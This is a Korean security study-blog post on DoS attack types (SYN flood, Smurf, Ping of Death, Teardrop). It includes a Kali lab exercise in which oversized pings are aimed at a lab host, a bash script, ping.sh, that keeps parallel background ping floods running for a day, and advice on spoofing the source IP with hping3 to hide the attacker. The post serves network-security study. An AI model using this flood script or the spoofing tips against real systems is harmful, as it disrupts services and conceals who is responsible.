- LAND Attack -> DoS attack ( 1 : 1 )
- Smurf Attack -> DDoS attack ( N : 1 )
- DoS Attack Type
1. Flood Attack
- TCP SYN Flood
공격자 IP를 spoofing 하고 half-open TCP 연결을 시도하여 상대 호스트의 Listening Queue를 고갈 시키는 공격
- UDP Flood Attack
UDP Body에 Garbage Data를 Padding 하여 공격
- ICMP Smurfing Attack
ICMP 프로토콜과 IP Broadcast 주소를 이용하여 공격
- ICMP Flood Attack
2. Software Attack
Ping of Death
ping 명령어를 이용하여 ICMP 패킷을 비 정상적으로 크게 만들어 공격하는 방법
파일을 크게 만들면 통신하기 위해 작은 단위로 쪼갠다. > 상대가 조립할게 많아 과부화
> 현재 OS 들은 ICMP 패킷을 크게 만들어도 감당 가능
TearDrop
패킷을 겹치거나 또는 일정한 간격이 빠지게 전송하는 방법 ( offset이 같은 패킷 전송 )
- ICMP LAND 툴 제작하기
( kali )
사용 명령어 : ping -s 60000 <Target IP >
-> ping 명령어로 파일의 크기를 늘려 부하량을 증가 시킨다.
부하량 확인
( linux200 )
# gnome-system-monitor &
( kali )
# gnome-system-monitor &
> 자원
# ping -s 60000 192.168.27.200
( linux200 )
> 부하가 많이 안걸리지만 걸리긴 걸린다.
> 부하량은 상관이없다 작으면 여러번 실행해서 부하량이 쌓이게 하면 된다.
( kali )
> 보내는 쪽도 부하가 조금 걸리는 듯 하다.
( kali )
# mkdir -p /root/bin
# cd /root/bin
# vi ping.sh
|
#!/bin/bash if [ $# -ne 1 ] ; then echo "Usage : $0 < Target IP > " exit 1 fi T_IP=$1 SIZE=60000 MAX=3 for i in `seq 1 $MAX` do ping -s $SIZE $T_IP > /dev/null 2>&1 & sleep 3 done sleep 86400 |
|
> 부하량이 적기때문에 ping 명령어를 백그라운드로 여러번 실행한다.
> sleep 86400 : 프로그램이 하루동안 실행된다. -> CTRL + C 키를 누르면 ping 도 끝난다.
> sleep 이 없다면 ping이 백 그라운드로 계속 실행되고 PID를 알아내 모두 삭제하거나 pkill 명령어를 이용해 ping 을 종료시켜야한다.
하지만 이러한 ping 공격은 자신의 IP도 노출되며 자신에게도 부하량이 걸린다.
자신에게 부하량도 안걸리면서 자신의 IP도 노출되지 않게 하려면?
-> hping3 툴로 공격자 IP를 바꾼다.
> 타겟은 SYN ACK을 spoofing한 존재하지 않는 IP로 보내기 때문에 공격하는 실제 서버는 받지 않는다.
> 공격 서버는 SYN 패킷만 보내고 받는 패킷은 없기때문에 부하량이 줄어든다.
'Security > Network Security' 카테고리의 다른 글
TCP Syn Flooding Attack 보안 방법 (0) | 2017.10.21 |
---|---|
TCP Syn Flooding Attack (0) | 2017.10.21 |
hping3 명령어 사용하기 (0) | 2017.10.21 |
TCP/UDP 대표적인 서비스 패킷 분석 (0) | 2017.10.19 |
Port 번호 체계 (0) | 2017.10.19 |